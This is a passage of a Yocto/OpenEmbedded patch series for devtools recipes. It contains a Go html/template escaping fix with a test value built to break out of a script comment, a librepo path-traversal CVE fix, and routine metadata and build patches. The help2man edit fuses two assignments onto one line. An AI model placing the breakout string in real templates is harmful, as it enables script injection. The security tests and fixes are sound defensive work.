++ // information in the error message, if a type has a MarshalJSON method,
++ // the content of the error message is not guaranteed. Since we insert
++ // the error into the template, as part of a comment, we attempt to
++ // prevent the error from either terminating the comment, or the script
++ // block itself.
++ //
++ // In particular we:
++ // * replace "*/" comment end tokens with "* /", which does not
++ // terminate the comment
++ // * replace "</script" with "\x3C/script", and "<!--" with
++ // "\x3C!--", which prevents confusing script block termination
++ // semantics
++ //
++ // We also put a space before the comment so that if it is flush against
+ // a division operator it is not turned into a line comment:
+ // x/{{y}}
+ // turning into
+ // x//* error marshaling y:
+ // second line of error message */null
+- return fmt.Sprintf(" /* %s */null ", strings.ReplaceAll(err.Error(), "*/", "* /"))
++ errStr := err.Error()
++ errStr = strings.ReplaceAll(errStr, "*/", "* /")
++ errStr = strings.ReplaceAll(errStr, "</script", `\x3C/script`)
++ errStr = strings.ReplaceAll(errStr, "<!--", `\x3C!--`)
++ return fmt.Sprintf(" /* %s */null ", errStr)
+ }
+
+ // TODO: maybe post-process output to prevent it from containing
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index de9ef28..3fc3baf 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -5,6 +5,7 @@
+ package template
+
+ import (
++ "errors"
+ "bytes"
+ "math"
+ "strings"
+@@ -104,61 +105,72 @@ func TestNextJsCtx(t *testing.T) {
+ }
+ }
+
++type jsonErrType struct{}
++
++func (e *jsonErrType) MarshalJSON() ([]byte, error) {
++ return nil, errors.New("beep */ boop </script blip <!--")
++}
++
+ func TestJSValEscaper(t *testing.T) {
+ tests := []struct {
+- x interface{}
+- js string
++ x interface{}
++ js string
++ skipNest bool
+ }{
+- {int(42), " 42 "},
+- {uint(42), " 42 "},
+- {int16(42), " 42 "},
+- {uint16(42), " 42 "},
+- {int32(-42), " -42 "},
+- {uint32(42), " 42 "},
+- {int16(-42), " -42 "},
+- {uint16(42), " 42 "},
+- {int64(-42), " -42 "},
+- {uint64(42), " 42 "},
+- {uint64(1) << 53, " 9007199254740992 "},
++ {int(42), " 42 ", false},
++ {uint(42), " 42 ", false},
++ {int16(42), " 42 ", false},
++ {uint16(42), " 42 ", false},
++ {int32(-42), " -42 ", false},
++ {uint32(42), " 42 ", false},
++ {int16(-42), " -42 ", false},
++ {uint16(42), " 42 ", false},
++ {int64(-42), " -42 ", false},
++ {uint64(42), " 42 ", false},
++ {uint64(1) << 53, " 9007199254740992 ", false},
+ // ulp(1 << 53) > 1 so this loses precision in JS
+ // but it is still a representable integer literal.
+- {uint64(1)<<53 + 1, " 9007199254740993 "},
+- {float32(1.0), " 1 "},
+- {float32(-1.0), " -1 "},
+- {float32(0.5), " 0.5 "},
+- {float32(-0.5), " -0.5 "},
+- {float32(1.0) / float32(256), " 0.00390625 "},
+- {float32(0), " 0 "},
+- {math.Copysign(0, -1), " -0 "},
+- {float64(1.0), " 1 "},
+- {float64(-1.0), " -1 "},
+- {float64(0.5), " 0.5 "},
+- {float64(-0.5), " -0.5 "},
+- {float64(0), " 0 "},
+- {math.Copysign(0, -1), " -0 "},
+- {"", `""`},
+- {"foo", `"foo"`},
++ {uint64(1)<<53 + 1, " 9007199254740993 ", false},
++ {float32(1.0), " 1 ", false},
++ {float32(-1.0), " -1 ", false},
++ {float32(0.5), " 0.5 ", false},
++ {float32(-0.5), " -0.5 ", false},
++ {float32(1.0) / float32(256), " 0.00390625 ", false},
++ {float32(0), " 0 ", false},
++ {math.Copysign(0, -1), " -0 ", false},
++ {float64(1.0), " 1 ", false},
++ {float64(-1.0), " -1 ", false},
++ {float64(0.5), " 0.5 ", false},
++ {float64(-0.5), " -0.5 ", false},
++ {float64(0), " 0 ", false},
++ {math.Copysign(0, -1), " -0 ", false},
++ {"", `""`, false},
++ {"foo", `"foo"`, false},
+ // Newlines.
+- {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
++ {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`, false},
+ // "\v" == "v" on IE 6 so use "\u000b" instead.
+- {"\t\x0b", `"\t\u000b"`},
+- {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+- {[]interface{}{}, "[]"},
+- {[]interface{}{42, "foo", nil}, `[42,"foo",null]`},
+- {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`},
+- {"<!--", `"\u003c!--"`},
+- {"-->", `"--\u003e"`},
+- {"<![CDATA[", `"\u003c![CDATA["`},
+- {"]]>", `"]]\u003e"`},
+- {"</script", `"\u003c/script"`},
+- {"\U0001D11E", "\"\U0001D11E\""}, // or "\uD834\uDD1E"
+- {nil, " null "},
++ {"\t\x0b", `"\t\u000b"`, false},
++ {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`, false},
++ {[]interface{}{}, "[]", false},
++ {[]interface{}{42, "foo", nil}, `[42,"foo",null]`, false},
++ {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`, false},
++ {"<!--", `"\u003c!--"`, false},
++ {"-->", `"--\u003e"`, false},
++ {"<![CDATA[", `"\u003c![CDATA["`, false},
++ {"]]>", `"]]\u003e"`, false},
++ {"</script", `"\u003c/script"`, false},
++ {"\U0001D11E", "\"\U0001D11E\"", false}, // or "\uD834\uDD1E"
++ {nil, " null ", false},
++ {&jsonErrType{}, " /* json: error calling MarshalJSON for type *template.jsonErrType: beep * / boop \\x3C/script blip \\x3C!-- */null ", true},
+ }
+
+ for _, test := range tests {
+ if js := jsValEscaper(test.x); js != test.js {
+ t.Errorf("%+v: want\n\t%q\ngot\n\t%q", test.x, test.js, js)
+ }
++ if test.skipNest {
++ continue
++ }
+ // Make sure that escaping corner cases are not broken
+ // by nesting.
+ a := []interface{}{test.x}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-crosssdk.inc b/meta/recipes-devtools/go/go-crosssdk.inc
index f0bec79719..36c9b12af8 100644
--- a/meta/recipes-devtools/go/go-crosssdk.inc
+++ b/meta/recipes-devtools/go/go-crosssdk.inc
@@ -4,6 +4,8 @@ DEPENDS = "go-native virtual/${TARGET_PREFIX}gcc-crosssdk virtual/nativesdk-${TA
PN = "go-crosssdk-${SDK_SYS}"
PROVIDES = "virtual/${TARGET_PREFIX}go-crosssdk"
+export GOCACHE = "${B}/.cache"
+
do_configure[noexec] = "1"
do_compile() {
diff --git a/meta/recipes-devtools/go/go-dep_0.5.4.bb b/meta/recipes-devtools/go/go-dep_0.5.4.bb
index 0da2c6607c..e29e53433e 100644
--- a/meta/recipes-devtools/go/go-dep_0.5.4.bb
+++ b/meta/recipes-devtools/go/go-dep_0.5.4.bb
@@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d"
GO_IMPORT = "github.com/golang/dep"
-SRC_URI = "git://${GO_IMPORT} \
+SRC_URI = "git://${GO_IMPORT};branch=master \
file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \
file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \
"
diff --git a/meta/recipes-devtools/go/go_1.14.bb b/meta/recipes-devtools/go/go_1.14.bb
index bc90a1329e..76ff788238 100644
--- a/meta/recipes-devtools/go/go_1.14.bb
+++ b/meta/recipes-devtools/go/go_1.14.bb
@@ -3,12 +3,12 @@ require go-target.inc
export GOBUILDMODE=""
export CGO_ENABLED_riscv64 = ""
-# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but mips/riscv
-# doesn't support -buildmode=pie, so skip the QA checking for mips/riscv and its
-# variants.
+# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but
+# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
+# for windows/mips/riscv and their variants.
python() {
- if 'mips' in d.getVar('TARGET_ARCH',True) or 'riscv' in d.getVar('TARGET_ARCH',True):
- d.appendVar('INSANE_SKIP_%s' % d.getVar('PN',True), " textrel")
+ if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
+ d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
else:
d.setVar('GOBUILDMODE', 'pie')
}
diff --git a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
index a60e851897..8e5f940deb 100644
--- a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
+++ b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
@@ -1,5 +1,6 @@
SUMMARY = "Program for creating simple man pages"
-SECTION = "devel"
+HOMEPAGE = "https://www.gnu.org/software/help2man/"
+DESCRIPTION = "help2man is a tool for automatically generating simple manual pages from program output."SECTION = "devel"
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
DEPENDS = "autoconf-native automake-native"
diff --git a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
index c5761170aa..fc17e8d9b4 100644
--- a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
+++ b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Set of i2c tools for linux"
HOMEPAGE = "https://i2c.wiki.kernel.org/index.php/I2C_Tools"
+DESCRIPTION = "The i2c-tools package contains a heterogeneous set of I2C tools for Linux: a bus probing tool, a chip dumper, register-level SMBus access helpers, EEPROM decoding scripts, EEPROM programming tools, and a python module for SMBus access. All versions of Linux are supported, as long as I2C support is included in the kernel."
SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
index 304ad7fec0..ce4d73caf6 100644
--- a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
+++ b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
@@ -1,6 +1,7 @@
# Copyright (c) 2018 Joshua Watt, Garmin International,Inc.
# Released under the MIT license (see COPYING.MIT for the terms)
SUMMARY = "Generates Icecream toolchain for SDK"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${WORKDIR}/icecc-env.sh;beginline=2;endline=20;md5=dd6b68c1efed8a9fb04e409b3b287d47"
diff --git a/meta/recipes-devtools/intltool/intltool_0.51.0.bb b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
index ecff2faf25..592dbb92e2 100644
--- a/meta/recipes-devtools/intltool/intltool_0.51.0.bb
+++ b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
@@ -1,4 +1,6 @@
SUMMARY = "Utility scripts for internationalizing XML"
+HOMEPAGE = "https://launchpad.net/intltool"
+DESCRIPTION = "Utility scripts for internationalizing XML. This tool automatically extracts translatable strings from oaf, glade, bonobo ui, nautilus theme and other XML files into the po files."
SECTION = "devel"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
diff --git a/meta/recipes-devtools/jquery/jquery_3.5.0.bb b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
index 5c6f9cddbe..efffe05fd2 100644
--- a/meta/recipes-devtools/jquery/jquery_3.5.0.bb
+++ b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "jQuery is a fast, small, and feature-rich JavaScript library"
HOMEPAGE = "https://jquery.com/"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
SECTION = "devel"
LIC_FILES_CHKSUM = "file://${WORKDIR}/${BP}.js;startline=8;endline=10;md5=b1e67ece919e852643f1541a54492d65"
@@ -16,6 +17,11 @@ SRC_URI[map.sha256sum] = "3149351c8cbc3fb230bbf6188617c7ffda77d9e14333f4f5f0aa1a
UPSTREAM_CHECK_REGEX = "jquery-(?P<pver>\d+(\.\d+)+)\.js"
+# https://github.com/jquery/jquery/issues/3927
+# There are ways jquery can expose security issues but any issues are in the apps exposing them
+# and there is little we can directly do
+CVE_CHECK_WHITELIST += "CVE-2007-2379"
+
inherit allarch
do_install() {
diff --git a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
index 98c55dca85..d9e712f74a 100644
--- a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
+++ b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
@@ -1,8 +1,10 @@
SUMMARY = "Libcomps is alternative for yum.comps library (which is for managing rpm package groups)."
+HOMEPAGE = "https://github.com/rpm-software-management/libcomps"
+DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pure C as library and there's bindings for python2 and python3."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/rpm-software-management/libcomps.git \
+SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \
file://0001-Add-crc32.c-to-sources-list.patch \
file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
"
diff --git a/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
new file mode 100644
index 0000000000..61d255581b
--- /dev/null
+++ b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
@@ -0,0 +1,58 @@
+From b4c5a3312287f31a2075a235db846ff611586d2c Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:23 +0200
+Subject: [PATCH] Mark job goal.upgrade with sltr as targeted
+
+It allows to keep installed packages in upgrade set.
+
+It also prevents from reinstalling of modified packages with same NEVRA.
+
+
+Backport commit b4c5a3312287f31a2075a235db846ff611586d2c from
+https://github.com/rpm-software-management/libdnf
+
+This bug is present in oe-core's dnf
+
+Remove changes to spec file from upstream
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ libdnf.spec | 4 ++--
+ libdnf/goal/Goal.cpp | 2 +-
+ libdnf/goal/Goal.hpp | 6 ++++--
+ 3 files changed, 7 insertions(+), 5 deletions(-)
+
+diff --git a/libdnf/goal/Goal.cpp b/libdnf/goal/Goal.cpp
+index b69be19..a38cbb4 100644
+--- a/libdnf/goal/Goal.cpp
++++ b/libdnf/goal/Goal.cpp
+@@ -767,7 +767,7 @@ void
+ Goal::upgrade(HySelector sltr)
+ {
+ pImpl->actions = static_cast<DnfGoalActions>(pImpl->actions | DNF_UPGRADE);
+- sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE);
++ sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE|SOLVER_TARGETED);
+ }
+
+ void
+diff --git a/libdnf/goal/Goal.hpp b/libdnf/goal/Goal.hpp
+index f33dfa2..d701317 100644
+--- a/libdnf/goal/Goal.hpp
++++ b/libdnf/goal/Goal.hpp
+@@ -86,8 +86,10 @@ public:
+ /**
+ * @brief If selector ill formed, it rises std::runtime_error()
+ *
+- * @param sltr p_sltr: It should contain only upgrades with obsoletes otherwise it can try to
+- * reinstall installonly packages.
++ * @param sltr p_sltr: It contains upgrade-to packages and obsoletes. The presence of installed
++ * packages prevents reinstalling packages with the same NEVRA but changed contant. To honor repo
++ * priority all relevant packages must be present. To upgrade package foo from priority repo, all
++ * installed and available packages of the foo must be in selector plus obsoletes of foo.
+ */
+ void upgrade(HySelector sltr);
+ void userInstalled(DnfPackage *pkg);
+--
+2.7.4
+
diff --git a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
index 43de06e7f9..39858ad401 100644
--- a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
+++ b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
@@ -1,14 +1,17 @@
SUMMARY = "Library providing simplified C and Python API to libsolv"
+HOMEPAGE = "https://github.com/rpm-software-management/libdnf"
+DESCRIPTION = "This library provides a high level package-manager. It's core library of dnf, PackageKit and rpm-ostree. It's replacement for deprecated hawkey library which it contains inside and uses librepo under the hood."
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/libdnf \
+SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=master;protocol=https \
file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \
file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \
file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \
file://0001-Add-WITH_TESTS-option.patch \
file://0001-include-stdexcept-for-runtime_error.patch \
file://fix-deprecation-warning.patch \
+ file://0040-Mark-job-goal.upgrade-with-sltr-as-target.patch \
"
SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77"
diff --git a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
index 5409051d79..7d8560f3cc 100644
--- a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
+++ b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
@@ -1,4 +1,6 @@
SUMMARY = "C Library for manipulating module metadata files"
+HOMEPAGE = "https://github.com/fedora-modularity/libmodulemd"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=25a3927bff3ee4f5b21bcb0ed3fcd6bb"
diff --git a/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
new file mode 100644
index 0000000000..8f4c5b73bc
--- /dev/null
+++ b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
@@ -0,0 +1,55 @@
+From 6027d68337b537bf9a68cf810cf9b8e40dac22f8 Mon Sep 17 00:00:00 2001
+From: Jaroslav Rohel <jrohel@redhat.com>
+Date: Wed, 12 Aug 2020 08:35:28 +0200
+Subject: [PATCH] Validate path read from repomd.xml (RhBug:1868639)
+
+= changelog =
+msg: Validate path read from repomd.xml
+type: security
+resolves: https://bugzilla.redhat.com/show_bug.cgi?id=1868639
+
+Upstream-Status: Accepted [https://github.com/rpm-software-management/librepo/commit/7daea2a2429a54dad68b1de9b37a5f65c5cf2600]
+CVE: CVE-2020-14352
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ librepo/yum.c | 17 +++++++++++++++++
+ 1 file changed, 17 insertions(+)
+
+diff --git a/librepo/yum.c b/librepo/yum.c
+index 3059188..529257b 100644
+--- a/librepo/yum.c
++++ b/librepo/yum.c
+@@ -23,6 +23,7 @@
+ #define BITS_IN_BYTE 8
+
+ #include <stdio.h>
++#include <libgen.h>
+ #include <assert.h>
+ #include <stdlib.h>
+ #include <errno.h>
+@@ -770,6 +771,22 @@ prepare_repo_download_targets(LrHandle *handle,
+ continue;
+
+ char *location_href = record->location_href;
++
++ char *dest_dir = realpath(handle->destdir, NULL);
++ path = lr_pathconcat(handle->destdir, record->location_href, NULL);
++ char *requested_dir = realpath(dirname(path), NULL);
++ lr_free(path);
++ if (!g_str_has_prefix(requested_dir, dest_dir)) {
++ g_debug("%s: Invalid path: %s", __func__, location_href);
++ g_set_error(err, LR_YUM_ERROR, LRE_IO, "Invalid path: %s", location_href);
++ g_slist_free_full(*targets, (GDestroyNotify) lr_downloadtarget_free);
++ free(requested_dir);
++ free(dest_dir);
++ return FALSE;
++ }
++ free(requested_dir);
++ free(dest_dir);
++
+ gboolean is_zchunk = FALSE;
+ #ifdef WITH_ZCHUNK
+ if (handle->cachedir && record->header_checksum)
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/librepo/librepo_1.11.2.bb b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
index 6a0a59f865..73a58f75e3 100644
--- a/meta/recipes-devtools/librepo/librepo_1.11.2.bb
+++ b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
@@ -1,11 +1,14 @@
SUMMARY = "A library providing C and Python (libcURL like) API \
for downloading linux repository metadata and packages."
+HOMEPAGE = "https://github.com/rpm-software-management/librepo"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/librepo.git \
+SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \
file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \
file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \
+ file://CVE-2020-14352.patch \
"
SRCREV = "67c2d1f83f1bf87be3f26ba730fce7fbdf0c9fba"
diff --git a/meta/recipes-devtools/libtool/libtool-2.4.6.inc b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
index 8e17b56d46..c8744e6d5f 100644
--- a/meta/recipes-devtools/libtool/libtool-2.4.6.inc
+++ b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
@@ -21,6 +21,10 @@ SRC_URI = "${GNU_MIRROR}/libtool/libtool-${PV}.tar.gz \
file://unwind-opt-parsing.patch \
file://0001-libtool-Fix-support-for-NIOS2-processor.patch \
file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \
+ file://0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch \
+ file://0001-Makefile.am-make-sure-autoheader-run-before-automake.patch \
+ file://lto-prefix.patch \
+ file://debian-no_hostname.patch \
"
SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e"
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
new file mode 100644
index 0000000000..2e9908725e
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
@@ -0,0 +1,35 @@
+From dfbbbd359e43e0a55fbea06f2647279ad8761cb9 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Wed, 24 Mar 2021 03:04:13 +0000
+Subject: [PATCH] Makefile.am: make sure autoheader run before autoconf
+
+autoheader will update ../libtool-2.4.6/libltdl/config-h.in which
+autoconf needs, so there comes a race sometimes as below:
+ | configure.ac:45: error: required file 'config-h.in' not found
+ | touch '../libtool-2.4.6/libltdl/config-h.in'
+
+So make sure autoheader run before autoconf to avoid this race.
+
+Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ Makefile.am | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile.am b/Makefile.am
+index 4142c90..fe1a9fc 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -365,7 +365,7 @@ lt_configure_deps = $(lt_aclocal_m4) $(lt_aclocal_m4_deps)
+ $(lt_aclocal_m4): $(lt_aclocal_m4_deps)
+ $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(ACLOCAL) -I ../m4
+
+-$(lt_configure): $(lt_configure_deps)
++$(lt_configure): $(lt_configure_deps) $(lt_config_h_in)
+ $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOCONF)
+
+ $(lt_config_h_in): $(lt_configure_deps)
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
new file mode 100644
index 0000000000..87f8492346
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
@@ -0,0 +1,35 @@
+From e82c06584f02e3e4487aa73aa05981e2a35dc6d1 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Tue, 13 Apr 2021 07:17:29 +0000
+Subject: [PATCH] Makefile.am: make sure autoheader run before automake
+
+When use automake to generate Makefile.in from Makefile.am, there
+comes below race:
+ | configure.ac:45: error: required file 'config-h.in' not found
+
+It is because the file config-h.in in updating process by autoheader,
+so make automake run after autoheader to avoid the above race.
+
+Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ Makefile.am | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile.am b/Makefile.am
+index 2752ecc..29950db 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -328,7 +328,7 @@ EXTRA_DIST += $(lt_aclocal_m4) \
+ $(lt_obsolete_m4) \
+ $(stamp_mk)
+
+-$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4)
++$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4) $(lt_config_h_in)
+ $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOMAKE) Makefile
+
+ # Don't let unused scripts leak into the libltdl Makefile
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/libtool/libtool/lto-prefix.patch b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
new file mode 100644
index 0000000000..2bd010b8e4
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
@@ -0,0 +1,22 @@
+If lto is enabled, we need the prefix-map variables to be passed to the linker.
+Add these to the list of options libtool passes through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libtool-2.4.6/build-aux/ltmain.in
+===================================================================
+--- libtool-2.4.6.orig/build-aux/ltmain.in
++++ libtool-2.4.6/build-aux/ltmain.in
+@@ -5424,9 +5424,10 @@ func_mode_link ()
+ # --sysroot=* for sysroot support
+ # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization
+ # -stdlib=* select c++ std lib with clang
++ # -f*-prefix-map* needed for lto linking
+ -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \
+ -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \
+- -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*)
++ -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*|-f*-prefix-map*)
+ func_quote_for_eval "$arg"
+ arg=$func_quote_for_eval_result
+ func_append compile_command " $arg"
diff --git a/meta/recipes-devtools/libtool/libtool_2.4.6.bb b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
index a5715faaa9..f5fdd00e5e 100644
--- a/meta/recipes-devtools/libtool/libtool_2.4.6.bb
+++ b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
@@ -1,6 +1,6 @@
require libtool-${PV}.inc
-SRC_URI += "file://multilib.patch file://debian-no_hostname.patch"
+SRC_URI += "file://multilib.patch"
RDEPENDS_${PN} += "bash"
diff --git a/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch b/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch
new file mode 100644
index 0000000000..20eea060b1
--- /dev/null
+++ b/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch
@@ -0,0 +1,31 @@
+From 86940d87026432683fb6741cd8a34d3b9b18e40d Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Fri, 27 Nov 2020 10:11:08 +0000
+Subject: [PATCH] AsmMatcherEmitter: sort ClassInfo lists by name as well
+
+Otherwise, there are instances which are identical in
+every other field and therefore sort non-reproducibly
+(which breaks binary and source reproducibility).
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ llvm/utils/TableGen/AsmMatcherEmitter.cpp | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/llvm/utils/TableGen/AsmMatcherEmitter.cpp b/llvm/utils/TableGen/AsmMatcherEmitter.cpp
+index ccf0959389b..1f801e83b7d 100644
+--- a/llvm/utils/TableGen/AsmMatcherEmitter.cpp
++++ b/llvm/utils/TableGen/AsmMatcherEmitter.cpp
+@@ -359,7 +359,10 @@ public:
+ // name of a class shouldn't be significant. However, some of the backends
+ // accidentally rely on this behaviour, so it will have to stay like this
+ // until they are fixed.
+- return ValueName < RHS.ValueName;
++ if (ValueName != RHS.ValueName)
++ return ValueName < RHS.ValueName;
++ // All else being equal, we should sort by name, for source and binary reproducibility
++ return Name < RHS.Name;
+ }
+ };
+
diff --git a/meta/recipes-devtools/llvm/llvm_git.bb b/meta/recipes-devtools/llvm/llvm_git.bb
index a8607f5008..de92cef1a4 100644
--- a/meta/recipes-devtools/llvm/llvm_git.bb
